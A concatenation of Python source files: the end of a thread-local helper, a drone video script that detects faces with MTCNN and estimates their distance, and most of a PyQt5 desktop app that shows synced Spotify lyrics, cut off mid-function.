# We need to create the thread dict in anticipation of
# __init__ being called, to make sure we don't call it
# again ourselves.
impl.create_dict()
return self
def __getattribute__(self, name):
with _patch(self):
return object.__getattribute__(self, name)
def __setattr__(self, name, value):
if name == '__dict__':
raise AttributeError(
"%r object attribute '__dict__' is read-only"
% self.__class__.__name__)
with _patch(self):
return object.__setattr__(self, name, value)
def __delattr__(self, name):
if name == '__dict__':
raise AttributeError(
"%r object attribute '__dict__' is read-only"
% self.__class__.__name__)
with _patch(self):
return object.__delattr__(self, name)
|
test_video.py | import socket
import threading
import time
import pickle
import cv2
from Detection.MtcnnDetector import MtcnnDetector
from Detection.detector import Detector
from Detection.fcn_detector import FcnDetector
from train_models.mtcnn_model import P_Net, R_Net, O_Net
import visualization_utils
thresh = [0.7, 0.1, 0.1]
min_face_size = 24
stride = 2
slide_window = True
shuffle = False
detectors = [None, None, None]
prefix = ['data/MTCNN_model/PNet_landmark/PNet', 'data/MTCNN_model/RNet_landmark/RNet', 'data/MTCNN_model/ONet_landmark/ONet']
epoch = [18, 14, 16]
model_path = ['%s-%s' % (x, y) for x, y in zip(prefix, epoch)]
PNet = FcnDetector(P_Net, model_path[0])
detectors[0] = PNet
RNet = Detector(R_Net, 24, 1, model_path[1])
detectors[1] = RNet
ONet = Detector(O_Net, 48, 1, model_path[2])
detectors[2] = ONet
mtcnn_detector = MtcnnDetector(detectors=detectors, min_face_size=min_face_size,stride=stride, threshold=thresh, slide_window=slide_window)
# in cm, etc, assumed same width during flight
initial_flight_height = 20
# focal length = (P * D) / W
# assume D = W
focal_length = initial_flight_height * 10
def midpoint(x, y):
return ((x[0] + y[0]) * 0.5, (x[1] + y[1]) * 0.5)
def distance_to_camera(initial_width, focal_length, virtual_width):
return (initial_width * focalLength) / virtual_width
header = b'\x00\x00\x00\x01gM@(\x95\xa0<\x05\xb9\x00\x00\x00\x01h\xee8\x80'
h264 = []
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock_video = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock_video.bind(('192.168.10.3', 6038))
def receive_video():
global h264
while True:
data, addr = sock_video.recvfrom(2048)
if len(data[2:]) not in [8,13]:
h264.append(data[2:])
def run_cam():
global h264
while True:
k = sum([int(len(i) < 1000) for i in h264])
temp = []
for i in reversed(range(len(h264))):
if len(h264[i]) < 1000:
count, temp = 0, [h264[i]]
for n in reversed(range(len(h264[:i]))):
if len(h264[n]) < 1000:
count += 1
if count == 3:
break
temp.append(h264[n])
break
if k > 2:
with open('temp.h264','wb') as fopen:
fopen.write(header+b''.join(temp[::-1]))
h264.clear()
cap = cv2.VideoCapture('temp.h264')
while True:
try:
last_time = time.time()
ret, img = cap.read()
boxes_c,_ = mtcnn_detector.detect(img)
for u in range(boxes_c.shape[0]):
bbox = boxes_c[u, :4]
tl,tr,bl,br = [int(bbox[0]),int(bbox[1])],[int(bbox[2]),int(bbox[1])],[int(bbox[0]),int(bbox[3])],[int(bbox[2]),int(bbox[3])]
(tltrX, tltrY) = midpoint(tl, tr)
(blbrX, blbrY) = midpoint(bl, br)
(tlblX, tlblY) = midpoint(tl, bl)
(trbrX, trbrY) = midpoint(tr, br)
# virtual width
dA = dist.euclidean((tltrX, tltrY), (blbrX, blbrY))
# virtual height
dB = dist.euclidean((tlblX, tlblY), (trbrX, trbrY))
distance = distance_to_camera(initial_flight_height, focal_length, dA)
visualization_utils.draw_bounding_box_on_image_array(img,int(bbox[1]),int(bbox[0]),
int(bbox[3]),
int(bbox[2]),
'YellowGreen',display_str_list=['face','','distance: %.2fcm'%(distance)],
use_normalized_coordinates=False)
cv2.putText(img,'%.1f FPS'%(1/(time.time() - last_time)), (0,20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, 255)
cv2.imshow('cam',img)
if cv2.waitKey(30) & 0xFF == ord('q'):
break
except:
break
receive_thread = threading.Thread(target=receive_video)
receive_thread.daemon=True
receive_thread.start()
receive_cam_thread = threading.Thread(target=run_cam)
receive_cam_thread.daemon = True
receive_cam_thread.start()
command = bytearray.fromhex('9617')
sock.sendto(b'conn_req:'+bytes(command), ('192.168.10.1',8889))
sock.sendto(bytes(bytearray.fromhex('cc58007c60250000006c95')), ('192.168.10.1',8889))
sock.sendto(bytes(bytearray.fromhex('cc600027682000000004fd9b')), ('192.168.10.1',8889))
try:
while True:
time.sleep(0.1)
sock.sendto(bytes(bytearray.fromhex('cc58007c60250000006c95')), ('192.168.10.1',8889))
except KeyboardInterrupt:
pass
|
SpotifyLyrics.pyw | #!/usr/bin/env python3
import configparser
import getpass
import os
import platform
import re
import subprocess
import sys
import threading
import time
import webbrowser
import pathvalidate
import pylrc
import sentry_sdk
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QSystemTrayIcon, QAction, QMenu, qApp, QMessageBox
import backend
from services import Config
if os.name == "nt":
import ctypes
ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID("spotifylyrics.version1")
class Communicate(QtCore.QObject):
signal = QtCore.pyqtSignal(str, str)
class LyricsTextBrowserWidget(QtWidgets.QTextBrowser):
wheelSignal = QtCore.pyqtSignal()
def wheelEvent(self, e):
try:
modifiers = e.modifiers()
if modifiers == QtCore.Qt.ControlModifier:
num_pixels = e.pixelDelta()
num_degrees = e.angleDelta()
factor = 1
if not num_pixels.isNull():
sign = 1 if num_pixels.y() > 0 else -1
UI.change_fontsize(sign * factor)
elif not num_degrees.isNull():
sign = 1 if num_degrees.y() > 0 else -1
UI.change_fontsize(sign * factor)
else:
super(QtWidgets.QTextBrowser, self).wheelEvent(e)
except:
pass
BRACKETS = re.compile(r'\[.+?\]')
HTML_TAGS = re.compile(r'<.+?>')
class UiForm:
sync = False
ontop = False
open_spotify = False
changed = False
dark_theme = False
info = False
minimize_to_tray = False
tray_icon = None
streaming_services = [backend.SpotifyStreamingService(), backend.VlcMediaPlayer(), backend.TidalStreamingService()]
def __init__(self):
self.lyrics = ""
self.timed = False
self.is_loading_settings = False
self.comm = Communicate()
self.comm.signal.connect(self.refresh_lyrics)
FORM.setObjectName("Form")
FORM.resize(550, 610)
FORM.setMinimumSize(QtCore.QSize(350, 310))
self.grid_layout_2 = QtWidgets.QGridLayout(FORM)
self.grid_layout_2.setObjectName("gridLayout_2")
self.vertical_layout_2 = QtWidgets.QVBoxLayout()
self.vertical_layout_2.setObjectName("verticalLayout_2")
self.horizontal_layout_2 = QtWidgets.QHBoxLayout()
self.horizontal_layout_2.setObjectName("horizontalLayout_2")
self.horizontal_layout_1 = QtWidgets.QHBoxLayout()
self.horizontal_layout_1.setObjectName("horizontalLayout_1")
self.label_song_name = QtWidgets.QLabel(FORM)
self.label_song_name.setObjectName("label_song_name")
self.label_song_name.setOpenExternalLinks(True)
self.horizontal_layout_2.addWidget(self.label_song_name, 0, QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter)
spacer_item = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontal_layout_2.addItem(spacer_item)
self.streaming_services_box = QtWidgets.QComboBox(FORM)
self.streaming_services_box.setGeometry(QtCore.QRect(160, 120, 69, 22))
self.streaming_services_box.addItems(str(n) for n in self.streaming_services)
self.streaming_services_box.setCurrentIndex(0)
self.streaming_services_box.currentIndexChanged.connect(self.options_changed)
self.horizontal_layout_2.addWidget(self.streaming_services_box, 0,
QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
self.change_lyrics_button = QtWidgets.QPushButton(FORM)
self.change_lyrics_button.setObjectName("pushButton")
self.change_lyrics_button.setText("Change Lyrics")
self.change_lyrics_button.clicked.connect(self.change_lyrics)
self.horizontal_layout_2.addWidget(self.change_lyrics_button, 0, QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
self.save_button = QtWidgets.QPushButton(FORM)
self.save_button.setObjectName("saveButton")
self.save_button.setText("Save Lyrics")
self.save_button.clicked.connect(self.save_lyrics)
self.horizontal_layout_2.addWidget(self.save_button, 0, QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
# Open Tab Button
self.chords_button = QtWidgets.QPushButton(FORM)
self.chords_button.setObjectName("chordsButton")
self.chords_button.setText("Chords")
self.chords_button.clicked.connect(self.get_chords)
self.horizontal_layout_2.addWidget(self.chords_button, 0, QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
self.options_combobox = QtWidgets.QComboBox(FORM)
self.options_combobox.setGeometry(QtCore.QRect(160, 120, 69, 22))
self.options_combobox.setObjectName("comboBox")
self.options_combobox.addItem("")
self.options_combobox.addItem("")
self.options_combobox.addItem("")
self.options_combobox.addItem("")
self.options_combobox.addItem("")
self.options_combobox.addItem("")
self.options_combobox.addItem("")
self.options_combobox.addItem("")
self.tray_icon = QSystemTrayIcon(FORM)
self.tray_icon.setIcon(QtGui.QIcon(self.get_resource_path('icon.png')))
show_action = QAction("Show", FORM)
quit_action = QAction("Exit", FORM)
show_action.triggered.connect(FORM.show)
quit_action.triggered.connect(qApp.quit)
tray_menu = QMenu()
tray_menu.addAction(show_action)
tray_menu.addAction(quit_action)
self.tray_icon.setContextMenu(tray_menu)
self.tray_icon.show()
self.tray_icon.activated.connect(FORM.icon_activated)
if os.name == "nt":
self.options_combobox.addItem("")
self.horizontal_layout_2.addWidget(self.options_combobox, 0, QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
self.font_size_box = QtWidgets.QSpinBox(FORM)
self.font_size_box.setMinimum(1)
self.font_size_box.setProperty("value", 10)
self.font_size_box.setObjectName("fontBox")
self.horizontal_layout_2.addWidget(self.font_size_box, 0, QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
self.vertical_layout_2.addLayout(self.horizontal_layout_2)
self.sync_adjustment_slider = QtWidgets.QSlider(FORM)
self.sync_adjustment_slider.setInvertedAppearance(True)
self.sync_adjustment_slider.setMinimum(-60)
self.sync_adjustment_slider.setMaximum(60)
self.sync_adjustment_slider.setSingleStep(1)
self.sync_adjustment_slider.setToolTipDuration(5000)
self.sync_adjustment_slider.setFixedWidth(25)
self.sync_adjustment_slider.valueChanged.connect(self.changed_slider)
self.sync_adjustment_slider.setValue(0)
self.horizontal_layout_1.addWidget(self.sync_adjustment_slider)
self.text_browser = LyricsTextBrowserWidget(FORM)
self.text_browser.setObjectName("textBrowser")
self.text_browser.setAcceptRichText(True)
self.text_browser.setStyleSheet("font-size: %spt;" % self.font_size_box.value() * 2)
self.text_browser.setFontPointSize(self.font_size_box.value())
self.horizontal_layout_1.addWidget(self.text_browser)
self.info_table = QtWidgets.QTableWidget(FORM)
self.info_table.setStyleSheet("font-size: %spt;" % self.font_size_box.value() * 2)
self.info_table.setColumnCount(2)
self.info_table.setMaximumWidth(300)
self.info_table.verticalHeader().setVisible(False)
self.info_table.horizontalHeader().setVisible(False)
self.info_table.horizontalHeader().setStretchLastSection(True)
self.info_table.setVisible(False)
self.horizontal_layout_1.addWidget(self.info_table)
self.vertical_layout_2.addLayout(self.horizontal_layout_1)
self.grid_layout_2.addLayout(self.vertical_layout_2, 2, 0, 1, 1)
self.retranslate_ui(FORM)
self.font_size_box.valueChanged.connect(self.update_fontsize)
self.options_combobox.currentIndexChanged.connect(self.options_changed)
QtCore.QMetaObject.connectSlotsByName(FORM)
FORM.setTabOrder(self.text_browser, self.options_combobox)
FORM.setTabOrder(self.options_combobox, self.font_size_box)
self.current_line_size_ratio = 1.25
self.current_line_style = {
"font-size": f"{self.current_line_size_ratio * self.font_size_box.value()}pt"
}
self.set_style()
self.load_save_settings()
self.spotify()
self.start_thread()
self.song = None
def changed_slider(self, value) -> None:
self.sync_adjustment_slider.setToolTip("%d seconds shifted" % value)
def streaming_service_changed(self) -> None:
self.spotify()
self.load_save_settings(save=True)
def get_current_streaming_service(self) -> backend.StreamingService:
return self.streaming_services[self.streaming_services_box.currentIndex()]
def load_save_settings(self, save=False) -> None:
if self.is_loading_settings:
return
settings_file = Config.SETTINGS_DIR + "settings.ini"
section = "settings"
if not os.path.exists(settings_file):
directory = os.path.dirname(settings_file)
if not os.path.exists(directory):
os.makedirs(directory)
loaded_config = configparser.ConfigParser(strict=False)
if not save:
self.is_loading_settings = True
try:
loaded_config.read(settings_file)
except configparser.MissingSectionHeaderError:
pass
self.sync = loaded_config.getboolean(section, "syncedlyrics", fallback=False)
self.ontop = loaded_config.getboolean(section, "alwaysontop", fallback=False)
self.open_spotify = loaded_config.getboolean(section, "openspotify", fallback=False)
self.dark_theme = loaded_config.getboolean(section, "darktheme", fallback=False)
self.info = loaded_config.getboolean(section, "info", fallback=False)
self.minimize_to_tray = loaded_config.getboolean(section, "minimizetotray", fallback=False)
self.font_size_box.setValue(loaded_config.getint(section, "fontsize", fallback=10))
Config.LYRICS_DIR = loaded_config.get(section, "LyricsPath", fallback=Config.LYRICS_DIR)
streaming_service_name = loaded_config.get(section, "StreamingService", fallback=None)
if streaming_service_name:
for i in range(len(self.streaming_services)):
if str(self.streaming_services[i]) == streaming_service_name:
self.streaming_services_box.setCurrentIndex(i)
break
FORM.move(loaded_config.getint(section, "X", fallback=FORM.pos().x()),
loaded_config.getint(section, "Y", fallback=FORM.pos().y()))
if loaded_config.getboolean(section, "FullScreen", fallback=False):
FORM.showFullScreen()
elif loaded_config.getboolean(section, "Maximized", fallback=False):
FORM.showMaximized()
else:
FORM.resize(loaded_config.getint(section, "Width", fallback=FORM.width().real),
loaded_config.getint(section, "Height", fallback=FORM.height().real))
if loaded_config.getboolean(section, "disableErrorReporting", fallback=False):
self.disableErrorReporting = True
sentry_sdk.init()
self.options_combobox.setItemText(8, "Error reporting disabled")
else:
self.disableErrorReporting = False
if self.dark_theme:
self.set_dark_theme()
if self.sync:
self.options_combobox.setItemText(2, "Synced Lyrics (on)")
if self.ontop:
FORM.setWindowFlags(FORM.windowFlags() | QtCore.Qt.WindowStaysOnTopHint)
self.options_combobox.setItemText(3, "Always on Top (on)")
FORM.show()
if self.open_spotify:
self.options_combobox.setItemText(4, "Open Spotify (on)")
if self.info:
self.options_combobox.setItemText(5, "Info (on)")
self.info_table.setVisible(True)
if self.minimize_to_tray:
self.options_combobox.setItemText(7, "Minimize to Tray (on)")
else:
loaded_config.add_section(section)
loaded_config[section]["SyncedLyrics"] = str(self.sync)
loaded_config[section]["AlwaysOnTop"] = str(self.ontop)
loaded_config[section]["OpenSpotify"] = str(self.open_spotify)
loaded_config[section]["DarkTheme"] = str(self.dark_theme)
loaded_config[section]["Info"] = str(self.info)
loaded_config[section]["MinimizeToTray"] = str(self.minimize_to_tray)
loaded_config[section]["FontSize"] = str(self.font_size_box.value())
loaded_config[section]["StreamingService"] = str(self.get_current_streaming_service())
loaded_config[section]["FullScreen"] = str(FORM.isFullScreen())
loaded_config[section]["Maximized"] = str(FORM.isMaximized())
loaded_config[section]["X"] = str(FORM.pos().x())
loaded_config[section]["Y"] = str(FORM.pos().y())
loaded_config[section]["Width"] = str(FORM.width().real)
loaded_config[section]["Height"] = str(FORM.height().real)
if self.disableErrorReporting:
loaded_config[section]["disableErrorReporting"] = str(self.disableErrorReporting)
if Config.LYRICS_DIR != Config.DEFAULT_LYRICS_DIR:
loaded_config[section]["LyricsPath"] = Config.LYRICS_DIR
with open(settings_file, 'w+') as settings:
loaded_config.write(settings)
self.is_loading_settings = False
def options_changed(self) -> None:
current_index = self.options_combobox.currentIndex()
if current_index == 1:
if self.dark_theme is False:
self.set_dark_theme()
else:
self.dark_theme = False
self.text_browser.setStyleSheet("")
self.label_song_name.setStyleSheet("")
self.options_combobox.setStyleSheet("")
self.font_size_box.setStyleSheet("")
self.sync_adjustment_slider.setStyleSheet("")
self.streaming_services_box.setStyleSheet("")
self.change_lyrics_button.setStyleSheet("")
self.save_button.setStyleSheet("")
self.chords_button.setStyleSheet("")
self.info_table.setStyleSheet("")
self.options_combobox.setItemText(1, "Dark Theme")
text = re.sub("color:.*?;", "color: black;", self.label_song_name.text())
self.label_song_name.setText(text)
FORM.setWindowOpacity(1.0)
FORM.setStyleSheet("")
self.set_style()
elif current_index == 2:
if self.sync:
self.options_combobox.setItemText(2, "Synced Lyrics")
else:
self.options_combobox.setItemText(2, "Synced Lyrics (on)")
self.sync = not self.sync
elif current_index == 3:
if self.ontop is False:
FORM.setWindowFlags(FORM.windowFlags() | QtCore.Qt.WindowStaysOnTopHint)
self.options_combobox.setItemText(3, "Always on Top (on)")
FORM.show()
else:
FORM.setWindowFlags(FORM.windowFlags() & ~QtCore.Qt.WindowStaysOnTopHint)
self.options_combobox.setItemText(3, "Always on Top")
FORM.show()
self.ontop = not self.ontop
elif current_index == 4:
if self.open_spotify:
self.options_combobox.setItemText(4, "Open Spotify")
else:
self.spotify()
self.options_combobox.setItemText(4, "Open Spotify (on)")
self.open_spotify = not self.open_spotify
elif current_index == 5:
if self.info:
self.options_combobox.setItemText(5, "Info")
self.info_table.setVisible(False)
else:
self.options_combobox.setItemText(5, "Info (on)")
self.info_table.setVisible(True)
self.info = not self.info
elif current_index == 6:
if os.name == "nt":
subprocess.Popen(r'explorer "' + Config.LYRICS_DIR + '"')
elif current_index == 7:
if self.minimize_to_tray:
self.options_combobox.setItemText(7, "Minimize to System Tray")
else:
self.options_combobox.setItemText(7, "Minimize to System Tray (on)")
self.minimize_to_tray = not self.minimize_to_tray
elif current_index == 8:
if self.disableErrorReporting:
self.options_combobox.setItemText(8, "Disable Error reporting")
else:
self.options_combobox.setItemText(8, "Error Reporting disabled")
self.disableErrorReporting = not self.disableErrorReporting
self.options_combobox.setCurrentIndex(0)
self.load_save_settings(save=True)
def set_style(self):
self.lyrics_text_align = QtCore.Qt.AlignLeft
if os.path.exists(Config.SETTINGS_DIR + "theme.ini"):
theme_file = Config.SETTINGS_DIR + "theme.ini"
else:
theme_file = "theme.ini"
if not os.path.exists(theme_file):
self.label_song_name.setStyleSheet("color: black; text-decoration: underline;")
return
section = "theme"
style_config = configparser.ConfigParser()
with open(theme_file, 'r') as theme:
style_config.read_string(f"[{section}]\n{theme.read()}")
align = style_config.get(section, "lyricstextalign", fallback="")
if align:
if align == "center":
self.lyrics_text_align = QtCore.Qt.AlignCenter
elif align == "right":
self.lyrics_text_align = QtCore.Qt.AlignRight
FORM.setWindowOpacity(style_config.getfloat(section, "windowopacity", fallback=1))
background = style_config.get(section, "backgroundcolor", fallback="")
if background:
FORM.setStyleSheet(f"background-color: {background};")
style = self.text_browser.styleSheet()
text_background = style_config.get(section, "lyricsbackgroundcolor", fallback="")
if text_background:
style = f"{style}background-color: {text_background};"
text_color = style_config.get(section, "lyricstextcolor", fallback="")
if text_color:
style = f"{style}color: %s;" % text_color
text_font = style_config.get(section, "lyricsfont", fallback="")
if text_font:
style = f"{style}font-family: \"{text_font}\";"
self.text_browser.setStyleSheet(style)
style = self.label_song_name.styleSheet()
label_color = style_config.get(section, "songnamecolor", fallback="")
if label_color:
style = style + "color: %s;" % label_color
text = re.sub("color:.*?;", f"color: {label_color};", self.label_song_name.text())
self.label_song_name.setText(text)
label_underline = style_config.getboolean(section, "songnameunderline", fallback=False)
if label_underline:
style = f"{style}text-decoration: underline;"
self.label_song_name.setStyleSheet(style)
style = self.font_size_box.styleSheet()
font_size_background = style_config.get(section, "fontboxbackgroundcolor", fallback="")
if font_size_background:
style = f"{style}background-color: {font_size_background};"
font_size_color = style_config.get(section, "fontboxtextcolor", fallback="")
if font_size_color:
style = f"{style}color: {font_size_color};"
self.streaming_services_box.setStyleSheet(style)
self.options_combobox.setStyleSheet(style)
self.font_size_box.setStyleSheet(style)
self.change_lyrics_button.setStyleSheet(style)
self.save_button.setStyleSheet(style)
self.chords_button.setStyleSheet(style)
self.current_line_size_ratio = style_config.getfloat(section, "currentLineSizeRatio", fallback=1.25)
self.current_line_style["font-size"] = f"{self.current_line_size_ratio * self.font_size_box.value()}pt"
current_line_background_color = style_config.get(section, "currentLineBackgroundColor", fallback="")
if current_line_background_color:
self.current_line_style["background-color"] = current_line_background_color
def set_dark_theme(self):
self.dark_theme = True
self.text_browser.setStyleSheet("background-color: #181818; color: #ffffff;")
self.label_song_name.setStyleSheet("color: #9c9c9c; text-decoration: underline;")
text = re.sub("color:.*?;", "color: #9c9c9c;", self.label_song_name.text())
self.label_song_name.setText(text)
self.sync_adjustment_slider.setStyleSheet("background-color: #181818; color: #9c9c9c;")
self.streaming_services_box.setStyleSheet("background-color: #181818; color: #9c9c9c;")
self.options_combobox.setStyleSheet("background-color: #181818; color: #9c9c9c;")
self.font_size_box.setStyleSheet("background-color: #181818; color: #9c9c9c;")
self.change_lyrics_button.setStyleSheet("background-color: #181818; color: #9c9c9c;")
self.save_button.setStyleSheet("background-color: #181818; color: #9c9c9c;")
self.chords_button.setStyleSheet("background-color: #181818; color: #9c9c9c;")
self.info_table.setStyleSheet("background-color: #181818; color: #9c9c9c;")
self.options_combobox.setItemText(1, "Dark Theme (on)")
FORM.setWindowOpacity(1.0)
FORM.setStyleSheet("background-color: #282828;")
@staticmethod
def get_resource_path(relative_path):
try:
base_path = sys._MEIPASS
except Exception:
base_path = os.path.abspath(".")
return os.path.join(base_path, relative_path)
def set_lyrics_with_alignment(self, lyrics):
self.text_browser.clear()
for line in lyrics.splitlines():
self.text_browser.append(line)
self.text_browser.setAlignment(self.lyrics_text_align)
def change_fontsize(self, offset):
self.font_size_box.setValue(self.font_size_box.value() + offset)
def update_fontsize(self):
self.text_browser.setFontPointSize(self.font_size_box.value())
style = self.text_browser.styleSheet()
style = style.replace('%s' % style[style.find("font"):style.find("pt;") + 3], '')
style = style.replace('p ', '')
self.text_browser.setStyleSheet(f"{style}p font-size: {self.font_size_box.value() * 2}pt;")
lyrics = self.text_browser.toPlainText()
self.set_lyrics_with_alignment(lyrics)
self.current_line_style["font-size"] = f"{self.current_line_size_ratio * self.font_size_box.value()}pt"
self.load_save_settings(save=True)
def retranslate_ui(self, form):
_translate = QtCore.QCoreApplication.translate
form.setWindowTitle(_translate("Form", f"Spotify Lyrics - {backend.get_version()}"))
form.setWindowIcon(QtGui.QIcon(self.get_resource_path('icon.png')))
if backend.check_version():
self.label_song_name.setText(_translate("Form", "Spotify Lyrics"))
else:
self.label_song_name.setText(_translate("Form",
"Spotify Lyrics <style type=\"text/css\">a {text-decoration: "
"none}</style><a "
"href=\"https://github.com/SimonIT/spotifylyrics/releases\"><sup>("
"update)</sup></a>"))
update_dialog = QMessageBox()
update_dialog.setWindowIcon(FORM.windowIcon())
update_dialog.setIcon(QMessageBox.Information)
update_dialog.setText("A newer version of SpotifyLyrics is available!")
update_dialog.setInformativeText("Do you want to download the newer version?")
update_dialog.setWindowTitle("Update available")
update_dialog.setStandardButtons(QMessageBox.Open | QMessageBox.Close)
update_result = update_dialog.exec()
if update_result == QMessageBox.Open:
webbrowser.open("https://github.com/SimonIT/spotifylyrics/releases")
self.text_browser.setText(_translate("Form", "Play a song in Spotify to fetch lyrics."))
self.font_size_box.setToolTip(_translate("Form", "Font Size"))
self.options_combobox.setItemText(0, _translate("Form", "Options"))
self.options_combobox.setItemText(1, _translate("Form", "Dark Theme"))
self.options_combobox.setItemText(2, _translate("Form", "Synced Lyrics"))
self.options_combobox.setItemText(3, _translate("Form", "Always on Top"))
self.options_combobox.setItemText(4, _translate("Form", "Open Spotify"))
self.options_combobox.setItemText(5, _translate("Form", "Info"))
if os.name == "nt":
self.options_combobox.setItemText(6, _translate("Form", "Open Lyrics Directory"))
self.options_combobox.setItemText(7, _translate("Form", "Minimize to Tray"))
self.options_combobox.setItemText(8, _translate("Form", "Disable error reporting"))
def add_service_name_to_lyrics(self, lyrics, service_name):
return '''<span style="font-size:%spx; font-style:italic;">Lyrics loaded from: %s</span>\n\n%s''' % (
(self.font_size_box.value() - 2) * 2, service_name, lyrics)
def display_lyrics(self, comm):
old_song_name = ""
while True:
song_name = backend.get_window_title(self.get_current_streaming_service())
if (old_song_name != song_name or self.changed) \
and song_name not in self.get_current_streaming_service().get_not_playing_windows_title():
self.sync_adjustment_slider.setValue(0)
comm.signal.emit(song_name, "Loading...")
if not self.changed:
old_song_name = song_name
start = time.time()
self.song = backend.Song.get_from_string(song_name)
self.lyrics = ""
if self.info:
backend.load_info(self, self.song)
lyrics_metadata = backend.get_lyrics(song=self.song, sync=self.sync)
else:
lyrics_metadata = backend.next_lyrics(song=self.song, sync=self.sync)
self.changed = False
self.lyrics = lyrics_metadata.lyrics
self.timed = lyrics_metadata.timed
if not lyrics_metadata.url:
header = song_name
else:
style = self.label_song_name.styleSheet()
if style == "":
color = "color: black"
else:
color = style
header = '''<style type="text/css">a {text-decoration: none; %s}</style><a href="%s">%s</a>''' \
% (color, lyrics_metadata.url, song_name)
lyrics_clean = lyrics_metadata.lyrics
if lyrics_metadata.timed:
self.sync_adjustment_slider.setVisible(self.sync)
lrc = pylrc.parse(lyrics_metadata.lyrics)
if lrc.album:
self.song.album = lrc.album
lyrics_clean = '\n'.join(e.text for e in lrc)
comm.signal.emit(header,
self.add_service_name_to_lyrics(lyrics_clean, lyrics_metadata.service_name))
count = 0
line_changed = True
while self.sync and not self.changed:
time_title_start = time.time()
window_title = backend.get_window_title(self.get_current_streaming_service())
time_title_end = time.time()
if window_title in self.get_current_streaming_service().get_not_playing_windows_title():
time.sleep(0.2)
start += 0.2 + time_title_end - time_title_start
elif song_name != window_title or not count + 1 < len(lrc):
self.sync_adjustment_slider.setValue(0)
break
else:
if lrc[count + 1].time - self.sync_adjustment_slider.value() <= time.time() - start:
count += 1
line_changed = True
if line_changed:
lrc[count - 1].text = HTML_TAGS.sub("", lrc[count - 1].text)
lrc[count].text =\
f"<b style=\"{self.dict_to_style(self.current_line_style)}\">{lrc[count].text}</b>"
if count - 2 > 0:
lrc[count - 3].text = HTML_TAGS.sub("", lrc[count - 3].text)
lrc[count - 2].text = "<a name=\"#scrollHere\">%s</a>" % lrc[count - 2].text
bold_lyrics = '<style type="text/css">p {font-size: %spt}</style><p>%s</p>' % \
(
self.font_size_box.value(),
'<br>'.join(e.text for e in lrc)
)
comm.signal.emit(
header,
self.add_service_name_to_lyrics(bold_lyrics, lyrics_metadata.service_name)
)
line_changed = False
time.sleep(0.5)
else:
time.sleep(0.2)
else:
self.sync_adjustment_slider.setVisible(False)
comm.signal.emit(
header,
self.add_service_name_to_lyrics(lyrics_clean, lyrics_metadata.service_name))
time.sleep(1)
def start_thread(self):
lyrics_thread = threading.Thread(target=self.display_lyrics, args=(self.comm,))
lyrics_thread.daemon = True
lyrics_thread.start()
def refresh_lyrics(self, song_name, lyrics):
_translate = QtCore.QCoreApplication.translate
if backend.get_window_title(self.get_current_streaming_service()):
self.label_song_name.setText(_translate("Form", song_name))
self.set_lyrics_with_alignment(_translate("Form", lyrics))
self.text_browser.scrollToAnchor("#scrollHere")
self.refresh_info()
def refresh_info(self):
self.info_table.clearContents()
if not self.song:
return
self.info_table.setRowCount(8)
index = 0
self.info_table.setItem(index, 0, QtWidgets.QTableWidgetItem("Title"))
self.info_table.setItem(index, 1, QtWidgets.QTableWidgetItem(self.song.name))
index += 1
self.info_table.setItem(index, 0, QtWidgets.QTableWidgetItem("Artist"))
self.info_table.setItem(index, 1, QtWidgets.QTableWidgetItem(self.song.artist))
index += 1
if self.song.album != "UNKNOWN":
self.info_table.setItem(index, 0, QtWidgets.QTableWidgetItem("Album"))
self.info_table.setItem(index, 1, QtWidgets.QTableWidgetItem(self.song.album))
index += 1
if self.song.genre != "UNKNOWN":
self.info_table.setItem(index, 0, QtWidgets.QTableWidgetItem("Genre"))
self.info_table.setItem(index, 1, QtWidgets.QTableWidgetItem(self.song.genre))
index += 1
if self.song.year != -1:
self.info_table.setItem(index, 0, QtWidgets.QTableWidgetItem("Year"))
self.info_table.setItem(index, 1, QtWidgets.QTableWidgetItem(str(self.song.year)))
index += 1
if self.song.cycles_per_minute != -1:
self.info_table.setItem(index, 0, QtWidgets.QTableWidgetItem("Cycles Per Minute"))
self.info_table.setItem(index, 1, QtWidgets.QTableWidgetItem(str(self.song.cycles_per_minute)))
index += 1
if self.song.beats_per_minute != -1:
self.info_table.setItem(index, 0, QtWidgets.QTableWidgetItem("Beats Per Minute"))
self.info_table.setItem(index, 1, QtWidgets.QTableWidgetItem(str(self.song.beats_per_minute)))
index += 1
if self.song.dances:
self.info_table.setItem(index, 0, QtWidgets.QTableWidgetItem("Dances"))
self.info_table.setItem(index, 1, QtWidgets.QTableWidgetItem("\n".join(self.song.dances)))
self.info_table.resizeRowsToContents()
self.info_table.resizeColumnsToContents()
def get_chords(self):
_translate = QtCore.QCoreApplication.translate
if self.song:
backend.load_chords(self.song)
else:
self.text_browser.append(_translate("Form", "I'm sorry, Dave. I'm afraid I can't do that."))
def change_lyrics(self):
_translate = QtCore.QCoreApplication.translate
if self.song:
self.changed = True
else:
self.text_browser.append(_translate("Form", "I'm sorry, Dave. I'm afraid I can't do that."))
def save_lyrics(self):
if not self.song or not self.lyrics:
return
if not os.path.exists(Config.LYRICS_DIR):
os.makedirs(Config.LYRICS_DIR)
artist = pathvalidate.sanitize_filename(self.song.artist)
name = pathvalidate.sanitize_filename(self.song.name)
new_lyrics_file_name = None
for lyrics_file_name in os.listdir(Config.LYRICS_DIR):
lyrics_file_name = os.path.join(Config.LYRICS_DIR, lyrics_file_name)
if os.path.isfile(lyrics_file_name):
file_parts = os.path.splitext(lyrics_file_name)
file_extension = file_parts[1].lower()
if file_extension in (".txt", ".lrc"):
file_name = file_parts[0].lower()
if name.lower() in file_name and artist.lower() in file_name:
save_dialog = QMessageBox()
save_dialog.setWindowIcon(FORM.windowIcon())
save_dialog.setIcon(QMessageBox.Information)
save_dialog.setText("You got already saved lyrics for the song %s by %s!" %
